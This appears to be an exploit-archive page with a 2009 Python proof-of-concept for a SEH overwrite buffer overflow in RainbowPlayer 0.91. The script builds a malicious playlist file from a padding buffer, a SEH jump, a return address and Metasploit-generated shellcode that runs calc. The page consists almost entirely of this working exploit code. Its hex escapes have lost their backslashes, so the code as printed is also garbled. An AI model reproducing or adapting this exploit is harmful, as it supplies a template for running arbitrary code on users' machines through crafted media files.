RainbowPlayer 0.91 (playlist) Universal SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RainbowPlayer 0.91 (playlist) Universal SEH Overwrite Exploit
# Published : 2009-03-10
# Author : His0k4
# Previous Title : Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit
# Next Title : Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit

#usage: exploit.py
#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe
#
print "**************************************************************************"
print " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploitn"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
         	
			
buff = "x41" * 605

next_seh = "xEBx06x41x41"

seh = "x08x2Ax01x10"


header1= "x22x65x78x70x6Cx6Fx69x74x2Ex6Dx70x33x22x20x30x0Ax22x43x3Ax5C"
header2= "x2Ex6Dx70x33x22"

# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
shellcode = (
	"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
	"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax67"
	"x58x50x30x42x30x42x6bx42x41x77x41x42x32x42x41x32"
	"x41x41x30x41x41x58x38x42x42x50x75x6bx59x79x6cx6b"
	"x58x37x34x53x30x35x50x53x30x6cx4bx41x55x47x4cx6c"
	"x4bx51x6cx63x35x54x38x77x71x7ax4fx6ex6bx70x4fx74"
	"x58x4ex6bx43x6fx37x50x43x31x5ax4bx47x39x4ex6bx37"
	"x44x6cx4bx45x51x58x6ex37x41x6bx70x6cx59x6cx6cx4f"
	"x74x6fx30x62x54x47x77x6bx71x59x5ax76x6dx74x41x6b"
	"x72x58x6bx69x64x65x6bx41x44x47x54x34x44x44x35x38"
	"x65x6ex6bx33x6fx31x34x37x71x6ax4bx51x76x6ex6bx44"
	"x4cx42x6bx6ex6bx43x6fx57x6cx55x51x6ax4bx4cx4bx47"
	"x6cx4ex6bx75x51x4ax4bx4ex69x31x4cx66x44x37x74x4f"
	"x33x55x61x4fx30x30x64x6ex6bx77x30x36x50x4ex65x39"
	"x50x31x68x64x4cx6cx4bx73x70x36x6cx6ex6bx30x70x37"
	"x6cx6cx6dx4ex6bx45x38x45x58x58x6bx73x39x6ex6bx4b"
	"x30x4ex50x75x50x73x30x63x30x6cx4bx45x38x65x6cx31"
	"x4fx30x31x4cx36x75x30x32x76x6dx59x59x68x6cx43x4b"
	"x70x41x6bx46x30x45x38x48x70x4ex6ax65x54x43x6fx71"
	"x78x4fx68x59x6ex4cx4ax76x6ex52x77x6bx4fx6bx57x72"
	"x43x53x51x30x6cx52x43x77x70x67"
    )

	
exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
    out_file = open("rainbow.rpl",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!n"
except:
    print "Error"

# www.Syue.com [2009-03-10]